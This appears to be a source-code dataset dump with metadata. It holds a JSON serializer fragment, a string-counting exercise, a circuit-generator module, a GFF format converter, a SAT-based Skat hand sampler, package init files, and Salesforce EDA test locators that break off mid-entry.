indent (int or None, optional) : Amount of indentation to use in generated JSON output. If ``None`` then no indentation is used, unless pretty output is enabled, in which case two spaces are used. (default: None) Any additional keyword arguments are passed to ``json.dumps``, except for some that are computed internally, and cannot be overridden: * allow_nan * indent * separators * sort_keys Examples: .. code-block:: python >>> data = dict(b=np.datetime64('2017-01-01'), a = np.arange(3)) >>>print(serialize_json(data)) {"a":[0,1,2],"b":1483228800000.0} >>> print(serialize_json(data, pretty=True)) { "a": [ 0, 1, 2 ], "b": 1483228800000.0 } ''' pretty = settings.pretty(pretty) if pretty: separators=(",", ": ") else: separators=(",", ":") if pretty and indent is None: indent = 2 content: Any buffers: List[Buffer] if isinstance(obj, Serialized): content = obj.content buffers = obj.buffers or [] else: content = obj buffers = [] encoder = PayloadEncoder(buffers=buffers, indent=indent, separators=separators) return encoder.encode(content) #----------------------------------------------------------------------------- # Dev API #----------------------------------------------------------------------------- class PayloadEncoder(JSONEncoder): def __init__(self, *, buffers: List[Buffer] = [], threshold: int = 100, indent: int | None = None, separators: Tuple[str, str] | None = None): super().__init__(sort_keys=False, allow_nan=False, indent=indent, separators=separators) self._buffers = {buf.id: buf for buf in buffers} self._threshold = threshold def default(self, obj: Any) -> Any: if isinstance(obj, Buffer): if obj.id in self._buffers: # TODO: and len(obj.data) > self._threshold: return obj.ref else: return obj.to_base64() else: return super().default(obj) #----------------------------------------------------------------------------- # Private API #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Code #-----------------------------------------------------------------------------
600
13
76
42858455a9d8d1c85110f33472d486a90e93cd08
129
py
Python
answers/Utkarsh Srivastava/Day 11/Question 2.py
arc03/30-DaysOfCode-March-2021
6d6e11bf70280a578113f163352fa4fa8408baf6
[ "MIT" ]
22
2021-03-16T14:07:47.000Z
2021-08-13T08:52:50.000Z
answers/Utkarsh Srivastava/Day 11/Question 2.py
arc03/30-DaysOfCode-March-2021
6d6e11bf70280a578113f163352fa4fa8408baf6
[ "MIT" ]
174
2021-03-16T21:16:40.000Z
2021-06-12T05:19:51.000Z
answers/Utkarsh Srivastava/Day 11/Question 2.py
arc03/30-DaysOfCode-March-2021
6d6e11bf70280a578113f163352fa4fa8408baf6
[ "MIT" ]
135
2021-03-16T16:47:12.000Z
2021-06-27T14:22:38.000Z
s = input()
c = 0
n = int(input())
a = [0]*3
c = 0
for i in range(n):
    a[i] = input()
for i in (a):
    print(s.count(i))
12.9
25
0.465116
s = input()
c = 0
n = int(input())
a = [0]*3
c = 0
for i in range(n):
    a[i] = input()
for i in (a):
    print(s.count(i))
0
0
0
894d4c7667d1425ee76f58054c9c118df88cf99b
3,334
py
Python
bag_serdes_ec-master/BagModules/bag_serdes_ec/sense_amp_strongarm.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
null
null
null
bag_serdes_ec-master/BagModules/bag_serdes_ec/sense_amp_strongarm.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
null
null
null
bag_serdes_ec-master/BagModules/bag_serdes_ec/sense_amp_strongarm.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
1
2020-01-07T04:53:53.000Z
2020-01-07T04:53:53.000Z
# -*- coding: utf-8 -*- from typing import Dict, Any import os import pkg_resources from bag.design import Module yaml_file = pkg_resources.resource_filename(__name__, os.path.join('netlist_info', 'sense_amp_strongarm.yaml')) # noinspection PyPep8Naming class bag_serdes_ec__sense_amp_strongarm(Module): """Module for library bag_serdes_ec cell sense_amp_strongarm. Fill in high level description here. """ @classmethod @classmethod
37.460674
95
0.520996
# -*- coding: utf-8 -*- from typing import Dict, Any import os import pkg_resources from bag.design import Module yaml_file = pkg_resources.resource_filename(__name__, os.path.join('netlist_info', 'sense_amp_strongarm.yaml')) # noinspection PyPep8Naming class bag_serdes_ec__sense_amp_strongarm(Module): """Module for library bag_serdes_ec cell sense_amp_strongarm. Fill in high level description here. """ def __init__(self, bag_config, parent=None, prj=None, **kwargs): Module.__init__(self, bag_config, yaml_file, parent=parent, prj=prj, **kwargs) @classmethod def get_params_info(cls): # type: () -> Dict[str, str] return dict( lch='Channel length, in meters.', w_dict='width dictionary.', th_dict='threshold dictionary.', seg_dict='number of segments dictionary.', dum_info='Dummy information data structure.', export_probe='True to export probe pins.', ) @classmethod def get_default_param_values(cls): # type: () -> Dict[str, Any] return dict( dum_info=None, export_probe=False, ) def design(self, lch, w_dict, th_dict, seg_dict, dum_info, export_probe): if not export_probe: for name in ['midp', 'midn', 'qp', 'qn']: self.remove_pin(name) tran_info_list = [('XTAILL', 'tail'), ('XTAILR', 'tail'), ('XINL', 'in'), ('XINR', 'in'), ('XNINVL', 'ninv'), ('XNINVR', 'ninv'), ('XPINVL', 'pinv'), ('XPINVR', 'pinv'), ('XRML', 'pinv', 'rst'), ('XRMR', 'pinv', 'rst'), ('XRIL', 'pinv', 'rst'), ('XRIR', 'pinv', 'rst'), ] for inst_info in tran_info_list: w = w_dict[inst_info[1]] th = th_dict[inst_info[1]] if len(inst_info) < 3: seg = seg_dict[inst_info[1]] else: seg = seg_dict[inst_info[2]] self.instances[inst_info[0]].design(w=w, l=lch, nf=seg, intent=th) # design dummies self.design_dummy_transistors(dum_info, 'XDUM', 'VDD', 'VSS') # design NAND gates w_ninv = w_dict['ninv'] w_pinv = w_dict['pinv'] th_ninv = th_dict['ninv'] th_pinv = th_dict['pinv'] seg_nand = seg_dict['nand'] self.instances['XNANDL'].design(nin=2, lch=lch, wp=w_pinv, wn=w_ninv, thp=th_pinv, thn=th_ninv, segp=seg_nand, segn=seg_nand) self.instances['XNANDR'].design(nin=2, lch=lch, wp=w_pinv, wn=w_ninv, thp=th_pinv, thn=th_ninv, segp=seg_nand, segn=seg_nand) # design buffers seg_buf = seg_dict['buf'] self.instances['XINVL'].design(lch=lch, wp=w_pinv, wn=w_ninv, thp=th_pinv, thn=th_ninv, segp=seg_buf, segn=seg_buf) self.instances['XINVR'].design(lch=lch, wp=w_pinv, wn=w_ninv, thp=th_pinv, thn=th_ninv, segp=seg_buf, segn=seg_buf)
2,698
0
106
771589f652cba1494d3ee1702e46549bfb1750de
261
py
Python
example/parse_space_to_tab.py
pflans/edge
d84de02bd9b334212b7405ecc4e68d3a209add99
[ "MIT" ]
32
2017-05-15T06:03:46.000Z
2022-02-18T08:30:19.000Z
example/parse_space_to_tab.py
pflans/edge
d84de02bd9b334212b7405ecc4e68d3a209add99
[ "MIT" ]
36
2017-05-11T01:29:14.000Z
2022-02-10T07:31:24.000Z
example/parse_space_to_tab.py
pflans/edge
d84de02bd9b334212b7405ecc4e68d3a209add99
[ "MIT" ]
4
2017-09-19T18:10:45.000Z
2019-11-29T03:38:08.000Z
# flake8: noqa
# Converting GFF format with space in lines starting with gi to tab

import sys
import re

fn = sys.argv[1]
f = open(fn, "r")

for l in f.read().split("\n"):
    if l.startswith("gi"):
        print re.sub(" ", "\t", l)
    else:
        print l
17.4
67
0.586207
# flake8: noqa
# Converting GFF format with space in lines starting with gi to tab

import sys
import re

fn = sys.argv[1]
f = open(fn, "r")

for l in f.read().split("\n"):
    if l.startswith("gi"):
        print re.sub(" ", "\t", l)
    else:
        print l
0
0
0
674346ea0686745d41b14badeff5ce6bb87c69bf
4,514
py
Python
sat_solver.py
mrolinek/alpha_skat
d045d5680829d9b70f710608d1a0dff2a43a89a2
[ "MIT" ]
null
null
null
sat_solver.py
mrolinek/alpha_skat
d045d5680829d9b70f710608d1a0dff2a43a89a2
[ "MIT" ]
null
null
null
sat_solver.py
mrolinek/alpha_skat
d045d5680829d9b70f710608d1a0dff2a43a89a2
[ "MIT" ]
null
null
null
import random
from itertools import islice

from pysat.solvers import Minicard
import numpy as np
# from numba import njit, int16

from utils import np_one_hot, softmax


# @njit(int16[:,:](int16[:]))
37
100
0.696721
import random from itertools import islice from pysat.solvers import Minicard import numpy as np # from numba import njit, int16 from utils import np_one_hot, softmax def add_equal(solver, literals, k): solver.add_atmost(literals, k=k) solver.add_atmost([-lit for lit in literals], k=len(literals) - k) def add_basic_clauses(solver): for i in range(1, 33): add_equal(solver, [i, i+32, i+64, i+96], k=1) add_equal(solver, list(range(1, 33)), k=10) add_equal(solver, list(range(33, 65)), k=10) add_equal(solver, list(range(65, 97)), k=10) add_equal(solver, list(range(97, 129)), k=2) # @njit(int16[:,:](int16[:])) def sol_to_numpy(sol): np_sol = np.zeros(shape=32 * 4, dtype=np.int16) np_sol[[i - 1 for i in sol if i > 0]] = 1 return np_sol.reshape(4, 32) def solve_sat_for_init_hands(public_state_array, num_solutions): assert public_state_array.shape == (4, 32), public_state_array.shape solver = Minicard() add_basic_clauses(solver) positives = np.argwhere(public_state_array == 1) positive_literals = [int(1 + 32*i+j) for (i, j) in positives] negatives = np.argwhere(public_state_array == -1) negative_literals = [int(-(1 + 32 * i + j)) for (i, j) in negatives] solutions = solver.enum_models( assumptions=positive_literals+negative_literals) # High number to ensure sufficient randomness sols = list(islice(solutions, 2000)) if len(sols) > num_solutions: sols = random.sample(sols, num_solutions) result = [sol_to_numpy(sol) for sol in sols] return result def top_k_likely_hands(ruleset, current_state, k, policy_model, init_hands_to_sample, epsilon=1e-4): top_candidates = solve_sat_for_init_hands( current_state.implications, init_hands_to_sample) assert top_candidates num_sampled = len(top_candidates) init_states = [current_state.recover_init_state( initial_hands) for initial_hands in top_candidates] action_sequence = current_state.actions_taken all_states, all_actions, all_masks = [], [], [] actions_per_init_state = None for init_state in init_states: added_states = 0 state = init_state for action in action_sequence: available_actions = ruleset.available_actions(state) assert action in available_actions if state.active_player != current_state.active_player: all_states.append(state) all_actions.append(action) all_masks.append(available_actions) added_states += 1 state = ruleset.do_action(state, action) actions_per_init_state = actions_per_init_state or added_states # Every init hand has equal number of actions to evaluate assert actions_per_init_state == added_states actions_per_init_state = added_states if not all_states: if len(top_candidates) > k: top_candidates = random.sample(top_candidates, k) return top_candidates # Run NN nn_states = [state.state_for_player( state.active_player).state_for_nn[None, ...] for state in all_states] nn_states = np.concatenate(nn_states, axis=0) all_masks_numpy = np.concatenate( [np_one_hot(mask, 32)[None, ...] 
for mask in all_masks], axis=0) policy_logits = policy_model.get_policy(nn_states) assert policy_logits.shape == all_masks_numpy.shape # Collect probabilities of init_hands policy_probabilities = softmax(policy_logits + 1000*(all_masks_numpy - 1)) log_probabilities = np.log(policy_probabilities + epsilon) log_probs_of_taken_actions = log_probabilities[np.arange( len(all_actions)), np.array(all_actions)] log_probs_by_init_state = log_probs_of_taken_actions.reshape( (num_sampled, actions_per_init_state)) log_probs_by_init_state = np.sum(log_probs_by_init_state, axis=1) probabilities_of_init_hands = softmax(log_probs_by_init_state) sampled_indices = np.random.choice(np.arange(len(top_candidates)), size=k, replace=True, p=probabilities_of_init_hands) sampled_hands = [top_candidates[int(i)] for i in sampled_indices] # Compute and return top_k # top_k_init_state_indices = np.argsort(-log_probs_by_init_state)[:k] # top_k_init_hands = [top_candidates[i] for i in top_k_init_state_indices] # print("Guessed hands:") # for hand in sampled_hands: # print(hand) return sampled_hands
4,195
0
114
da76f995d11bd28ae523a0312bda5e882e405910
18
py
Python
vapetool/__init__.py
vape-tool/VapeTool-BatteriesParser
54281efd489152367d1270b385c5dbef355bb4f3
[ "MIT" ]
null
null
null
vapetool/__init__.py
vape-tool/VapeTool-BatteriesParser
54281efd489152367d1270b385c5dbef355bb4f3
[ "MIT" ]
null
null
null
vapetool/__init__.py
vape-tool/VapeTool-BatteriesParser
54281efd489152367d1270b385c5dbef355bb4f3
[ "MIT" ]
null
null
null
name = "vapetool"
9
17
0.666667
name = "vapetool"
0
0
0
d79c076c8011693447d6fb2aef7d47c679a26d5d
95
py
Python
pdd_sdk/api/__init__.py
ymj4023/pdd_sdk
a8ab114542e5f450b7ea32fb3c0564dfbb2f4e36
[ "MIT" ]
1
2020-07-07T06:47:15.000Z
2020-07-07T06:47:15.000Z
pdd_sdk/api/__init__.py
ymj4023/pdd_sdk
a8ab114542e5f450b7ea32fb3c0564dfbb2f4e36
[ "MIT" ]
null
null
null
pdd_sdk/api/__init__.py
ymj4023/pdd_sdk
a8ab114542e5f450b7ea32fb3c0564dfbb2f4e36
[ "MIT" ]
null
null
null
""" __init__.py.py: """ from pdd_sdk.api.rest import * from pdd_sdk.api.base import FileItem
11.875
37
0.715789
""" __init__.py.py: """ from pdd_sdk.api.rest import * from pdd_sdk.api.base import FileItem
0
0
0
55c34f1cedaab14c52d32e5d7def43998f4cfbac
51,214
py
Python
robot/EDA/resources/locators_54.py
eclemmer/EDA
3a6d2b86acfdca47c450a34ba9bd7a73cd299b62
[ "BSD-3-Clause" ]
null
null
null
robot/EDA/resources/locators_54.py
eclemmer/EDA
3a6d2b86acfdca47c450a34ba9bd7a73cd299b62
[ "BSD-3-Clause" ]
null
null
null
robot/EDA/resources/locators_54.py
eclemmer/EDA
3a6d2b86acfdca47c450a34ba9bd7a73cd299b62
[ "BSD-3-Clause" ]
1
2022-02-25T18:23:49.000Z
2022-02-25T18:23:49.000Z
""" Locators for Spring '22 """ eda_lex_locators = { "app_tile": "//one-app-launcher-modal//one-app-launcher-app-tile//a[.='{}']", "app_item": "//a[@data-label='{}']", "frame": "//iframe[contains(@id, '{}') or contains(@title, '{}') or contains(@name, '{}')]", "input_placeholder": "//input[contains(@placeholder,'{}')]", "panel_tab_lookup": "//a/span[text()='{}']", "toast_message": "//div[@id='successToast']/descendant::h2[text()='{}']", "success_message": "//div[@id='successToast']/descendant::h2[text()='{}']", "toast_close": "//div[@id='successToast']/descendant::button[contains(@class, 'slds-notify__close')]", "close_tab": "//*[@data-key='close']/ancestor::button[contains(@class, 'slds-button slds-button_icon-x-small')]", "mailing_address": "//*[contains(@placeholder,'{}')]", "record": { "actions": "//div[contains(@class, 'actionsContainer')]/descendant::a[@title='{}']", "button": "//div[@class='actionsContainer']/button[@title='{}']", "datepicker": "//div[contains(@class,'uiDatePickerGrid')]/table[@class='calGrid']//span[text()='{}']", "edit_button": '//*[@title="{}"]', "list": "//div[contains(@class,'forcePageBlockItem')]//div//div//div//span//span[contains(text(), 'Primary Address Type')]/../../div/div/div/div/a[@class='select']", "related": { "new": "//div[@class='container']/descendant::div[contains(@class, 'slds-card__header')]/header/descendant::span[text()='{}']/ancestor::header/following-sibling::div/descendant::a[@title='New']", "title": "//span[@title='{}']", }, }, "tabs": { "tab": "//div[@class='uiTabBar']/ul[@class='tabs__nav']/li[contains(@class,'uiTabItem')]/a[@class='tabHeader']/span[contains(text(), '{}')]", "spl-tab": "//div[@class='slds-tabs_default']//ul[@class='slds-tabs_default__nav']/li[contains(@class,'slds-tabs_default__item')]/a[text()= '{}']", }, "eda_setup": { "custom_settings": "//a[text()='{}']", "settings_action_button": "//input[@type='submit' and @value='{}']", "setup_owner": "//table[@class='list']/descendant::td", }, "eda_settings": { "action": "//div[@role='banner']/descendant::button[contains(@class, 'settings-{}-bttn')]", "edit": "//div[@class='slds-page-header' and @role='banner']/descendant::span[text()='Edit']/parent::button", "tab": "//div[@id='tabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "checkbox_default": "//span[text()='{}']/../following-sibling::div/descendant::img", "checkbox": "//span[text()='{}']/../following-sibling::div/descendant::label[contains(@class,'slds-checkbox')]/span[contains(@class, 'slds-checkbox--faux')]", "save": "//div[contains(@class, 'slds-page-header')]/descendant::button[contains(@class, 'settings-save-bttn')]", "system_tab": "//a[contains(text(),'System')]", "affiliations_tab": "//a[contains(text(),'Affiliations')]", "affiliations_check": "//span[text()='Specify Role for Created Affiliations']/../following-sibling::div/div/div/label/span/img[@class = 'copy-start-date checked' and @alt='True']", "auto_enroll_business_organization": "//div/span[text()='Primary Business Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_educational_institution": "//div/span[text()='Primary Educational Institution']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_household_account": "//div/span[text()='Primary Household']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_sports_organization": 
"//div/span[text()='Primary Sports Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_university_department": "//div/span[text()='Primary Department']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "primary_affl_unchecked": "//div/span[text()='{}']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "checkbox_ap_affl": "(//label[@class='slds-checkbox']/input[@class='mapping-auto-enroll uiInput uiInputCheckbox uiInput--default uiInput--checkbox'])[1]/following-sibling::span[@class='slds-checkbox--faux']", "primary_affl_edit": "(//label/span[text()='Primary Affl Field: {}']/../../../following-sibling::div/div/div/label)[1]/input/following-sibling::span[@class='slds-checkbox--faux']", "affiliations_role_checkbox": "//input[@class='copy-start-date uiInput uiInputCheckbox uiInput--default uiInput--checkbox']/following-sibling::span", "affiliation_mappings_tab": "//a[contains(text(), 'Affiliation Mappings')]", "courses": "//a[contains(text(),'Courses')]", "duration": "//div[.//span[text()='Duration'] and contains(@class, 'slds-form-element') ]//select//option[@value='60']", "hh_naming_check": "//input[@class='automatic-hh-acc uiInput uiInputCheckbox uiInput--default uiInput--checkbox']/following-sibling::span", "hh_naming_role_checkbox": "//select[@class='admin-account-naming-input-select select uiInput uiInputSelect uiInput--default uiInput--select']//option[@value='{{!{{!FirstName}}}} {{!LastName}} Administrative Account']", "hh_adminfnamelname": "//input[contains(@class,'firstName')]", "course_connections_tab": "//a[contains(text(),'Course Connections')]", "cc_checkbox": "//input[contains(@class,'slds-checkbox')]/parent::label", "student_select": "//select[contains(@class,'student-course-connection-record-type-input-select')]", "faculty_select": "//select[contains(@class,'faculty-course-connection-record-type-input-select')]", "status_student_affl": "//select[contains(@class,'affiliation-role-picklist-input-select')]", "status_spec_affl_not_deleted_former": "//select[contains(@class,'affiliation-status-delete-picklist-input-select')]", "status_current_picklist_affl": "//select[contains(@class,'affiliation-status-picklist-input-select')]", "default_account_model": "//span[text()='Default Account Model']", "store_errors": "//span[text()='Store Errors']", "send_error_notifications": "//span[text()='Send Error Notifications']", "error_notification_recipients": "//span[text()='Error Notification Recipients']", "disable_error_handling": "//span[text()='Disable Error Handling']", "automatic_household_naming": "//span[text()='Automatic Household Naming']", "adminstrative_account_name_format": "//span[text()='Administrative Account Name Format']", "household_account_name_format": "//span[text()='Household Account Name Format']", "batch_processing": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td[text()='Processing'])[1]", "just_batch": "(//td/following-sibling::td[text()='Batch Apex'])[1]", "batch_watch": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td)[1]", "wait_frame": "//iframe[contains(@title,'Apex Jobs ~ Salesforce - Developer Edition')]", "wait_loc_text": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td)[1]", "new_account": "//span[@title='New Account']", "affiliated_accounts": "//span[@title='Affiliated Accounts']", "affiliation_match": 
"//th[@data-label='Affiliation Key']/../descendant::a[@title='{}']", "edit_button": "//div[@class='slds-button-group']//span[contains(text(), 'Edit')]", "save_button": "//div[@class='slds-button-group']//span[contains(text(), 'Save')]", "administrative_account": "//div/a[text()='{} Administrative Account']", "contact_edit": "//a[@title='Edit']", "en_re_type_validation": "(//div/span[text()='Record Type Validation']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "ert_validation": "//span/img[@class='affl-record-type-enforced checked' and @alt='True']", "un_ert_validation": "//span/img[@class='affl-record-type-enforced unchecked' and @alt='False']", "delete_rec_affl": "//span/img[@class='delete-prog-enroll checked' and @alt='True']", "un_delete_rec_affl": "//span/img[@class='delete-prog-enroll unchecked' and @alt='False']", "del_rel_affl": "(//div/span[text()='Delete Related Affiliation When Deleting Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "un_specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date unchecked' and @alt='False']", "specify_r_checkbox": "(//div/span[text()='Specify Role for Created Affiliations']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "copy_affl_end_date": "//span/img[@class='copy-end-date checked' and @alt='True']", "un_copy_affl_end_date": "//span/img[@class='copy-end-date unchecked' and @alt='False']", "copy_affliation_end_checkbox": "(//div/span[text()='Copy Affiliation End Date from Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "un_copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date unchecked' and @alt='False']", "copy_affliation_start_checkbox": "(//div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "settings_tab": "(//li[@class='slds-tabs__item slds-text-heading--label slds-active' and @role='tab' and @title='Settings'])[1]/a[contains(text(),'Settings')]", "affl_mappings_tab": "//a[contains(text(),'Affiliation Mappings')]", "default_checkbox": "//div[text()='{}']/following-sibling::div/descendant::img", "enable_checkbox": "(//div[text()='{}']/following-sibling::div/descendant::span)[1]", "dropdown_field": "//div[text()='{}']/following-sibling::div/select", "action_button": "//button[text()='{}']", "update_checkbox": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", "add_setting_button": "//span[text()='{}']/../following-sibling::button/span[text()='{}']", }, "eda_settings_new": { "global_action": "//button[text()='{}']", "edc_header": "//h2[contains(@class, 'header')]/descendant::span[text()='{}']", "toast_message": "//div[contains(@class, 'slds-theme--success slds-notify--toast slds-notify slds-notify--toast forceToastMessage')]/descendant::span[text()='{}']", "custom_toast": "//div[contains(@class, 'forceToastMessage')]/descendant::span[contains(@class, 
'toastMessage')]", "settings_nav_title": "//div[@data-qa-locator='edaSettingsNavigation']/descendant::a[text()='{}']", "dropdown_input": "//label[text()='{}']/../descendant::button[contains(@class, 'slds-combobox__input')]", "settings_dropdown": "//label[text()='{}']/../descendant::span[text()='{}']", "select_from_list": "//div[text()='{}']/../following-sibling::div/descendant::div[contains(@class, 'list__options')]/descendant::span[text()='{}']", "move_to_selected": "//div[text()='{}']/../following-sibling::div/descendant::button[@type='button' and @title='Move selection to Selected Account Record Types']", "tell_me_more": "//div[text()='{}']/../descendant::a[text()='{}']", "toggle_status": "//span[text()='{}']/../ancestor::lightning-input", "toggle_input": "//span[text()='{}']/../descendant::span[contains(@id, 'toggle')]", "update_button": "//div[text()='{}']/../parent::div/descendant::button[text()='{}']", "footer_button": "//div[contains(@class, 'footer')]/descendant::button[@title='{}']", "app_tile": "//h2[text()='{}']/../descendant::ul/descendant::*[self::div or self::span][text()='{}']", "show_actions_button": "//tr[@data-row-key-value='{}']/descendant::span[text()='Show actions']/ancestor::button[@type='button']", "actions_menu": "//tr[@data-row-key-value='{}']/descendant::span[text()='{}']/ancestor::a[@role='menuitem']", }, "eda_settings_cc": { "default_cc_checkbox": "//div[text()='Enable Course Connections']/following-sibling::div/descendant::img", "dropdown_values": "//div[text()='{}']/following-sibling::div/select/option[text()='{}']", "dropdown_values_count": "//div[text()='{}']/following-sibling::div/select/option", "enable_cc_checkbox": "//div[text()='Enable Course Connections']/following-sibling::div[1]/descendant::span", "enable_cc_warning_enabled": "//div[contains(@class, 'slds-notify') and @role='alert']/descendant::*[@data-key='warning']/../../following-sibling::span[text()='You must enable Course Connections before editing record types.']", "enable_cc_warning_disabled": "//span[contains(@class, 'slds-hide')]/descendant::div[contains(@class, 'slds-notify') and @role='alert']/descendant::*[@data-key='warning']/../../following-sibling::span[text()='You must enable Course Connections before editing record types.']", "updated_dropdown_value": "//div[text()='{}']/following-sibling::div/descendant::span[text()='{}']", "settings_tab": "//div[contains(@class, 'CourseConnections')]/descendant::a[text()='Settings']", "backfill_warning_enabled": "//div[contains(@class, 'slds-notify--alert')]/descendant::span[text()='You must enable Course Connections before running the Course Connections Backfill.']", "backfill_warning_disabled": "//span[contains(@class, 'slds-hide')]/descendant::span[text()='You must enable Course Connections before running the Course Connections Backfill.']", "cc_sub_tabs": "//div[contains(@class, 'CourseConnections')]/descendant::a[text()='{}']", "backfill_button_status": "//span[text()='{}']/parent::button", "backfill_checkbox_status": "//input[contains(@class, 'backfill')]/following-sibling::span[contains(@class, 'checkbox')]", "backfill_checkbox": "//span[text()='I understand and am ready to run Backfill.']/../span[contains(@class, 'checkbox')]", "backfill_toast": "//div[@id='backFillToast']/descendant::span[text()='{}']", }, "eda_settings_program_plans": { "checkbox_read": "(//span[text()='{}']/../following-sibling::div/descendant::img)[1]", "checkbox_edit": "(//span[text()='{}']/../following-sibling::div/descendant::span)[1]", "updated_checkbox_edit": 
"//span[text()='{}']/../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", }, "eda_settings_affiliations": { "acc_rec_type_edit": "//span[text()='Acc Record Type: {}']/../following-sibling::input[contains(@class, 'mapping-acc-rec-type')]", "acc_rec_type_cleared": "//span[text()='Acc Record Type: ']/../following-sibling::input[contains(@class, 'mapping-acc-rec-type')]", }, "eda_settings_courses": { "text_message": "//span[text()='{}']", }, "eda_settings_accounts_contacts": { "checkbox": "//span[text()='{}']/following::div[1]/descendant::span[text()='{}']/parent::label/span[contains(@class, 'checkbox')]", "checkbox_value": "//span[text()='{}']/following::label[1][contains(@class, 'checkbox')]/span[contains(@class, 'checkbox')]", "checkbox_list": "//span[text()='{}']/../../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", "checkbox_list_read": "//span[text()='{}']/../../following-sibling::div[1]/descendant::img", "dropdown_acc": "//span[text()='{}']/../following-sibling::div[1]/select/option[text()='{}']", }, "eda_settings_relationships": { "dropdown_read": "//span[text()='{}']/../following-sibling::div[1]/descendant::span", "dropdown_value": "//span[text()='{}']/../following-sibling::div/descendant::select/option[text()='{}']", "new_reciprocal_setting": "//div[contains(@class, 'newrecsetting')]/descendant::span[text()='{}']/following::input[1]", "sub_tab": "//div[@id='relTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "active_checkbox": "//span[text()='{}']/following::input[contains(@class, 'new-rec-sett')]/../span[contains(@class, 'checkbox')]", "add_setting_button": "//div[contains(@class, 'newrecsetting')]/descendant::span[text()='{}']", "settings_count": "//span[contains(@class, 'Checkbox')]/img[contains(@class, 'rec-settg')]", "new_settings": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-{}]/span[contains(@class, 'rec-settg-{}') and text()='{}']", "new_setting_edit": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::input[contains(@class, 'rec-settg-{}')]/../label/span[text()='{}: {}']", "new_setting_checkbox": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-1]/descendant::img[contains(@class, 'rec-settg-{}')]", "new_setting_checkbox_edit": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-1]/descendant::input[contains(@class, 'rec-settg-{}')]/../span[contains(@class, 'checkbox')]", "delete_setting_icon": "//span[text()='{}: {}']/following::lightning-icon[1][contains(@class, 'delete')]", "removed_setting": "//span[contains(@class, 'rec-settg-{}') and text()='{}']", "removed_autoc_setting": "//span[contains(@class, 'autoc-settg-{}') and text()='{}']", "updtate_setting_name": "//span[text()='Name: {}']/../following-sibling::input[contains(@class, 'rec-settg-{}')]", "update_setting_name_cleared": "//span[text()='Name: ']/../following-sibling::input[contains(@class, 'rec-settg-name')]", "update_setting_rest": "(//span[text()='Name: {}']/following::input[contains(@class, 'rec-settg-{}')])[1]", "updated_setting": "//span[contains(@class, 'rec-settg-name') and text()='{}']/following::div/span[contains(@class, 'rec-settg-{}') and text()='{}']", "test_locator": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-2]/descendant::input[contains(@class, 'rec-settg-neutral')]", "new_autocreate_setting": "//div[contains(@class, 'newautocsetting')]/descendant::span[text()='{}']/following::input[1]", 
"campaign_type_textarea": "//div[contains(@class, 'newautocsetting')]/descendant::span[text()='{}']/following::textarea", "new_settings_autoc": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/span[contains(@class, 'autoc-settg-{}') and text()='{}']", "new_autoc_setting_edit": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::input[contains(@class, 'autoc-settg-{}')]/../label/span[text()='{}: {}']", "new_campaign_types_edit": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::textarea[contains(@class, 'autoc-settg-{}')]/../label/span[text()='{}: {}']", }, "eda_settings_system": { "default_checkbox": "//span[text()='{}']/../following-sibling::div[1]/descendant::img", "default_dropdown_value": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[text()='{}']", "admin_success_toast": "//div[@id='adminSuccessToast']/descendant::h2", "hh_success_toast": "//div[@id='hhSuccessToast']/descendant::h2", "other_accname_format": "//span[text()='{}']/../preceding-sibling::div[1]/descendant::input", "other_dropdown_value": "//span[text()='{}']/../preceding-sibling::div[1]/descendant::span[text()='{}']", "recipient_type_value": "//span[text()='{}']/../following-sibling::div/descendant::select/option[@value='{}']", "recipient_name": "//label[text()='{}']/../div/descendant::input", "recipient_lookup": "//div[contains(@class, 'lookup') and text()='{}']", }, "account_types": { "administrative": "//span[contains(text(),'Administrative')]/parent::*", "household": "//span[text()='Household 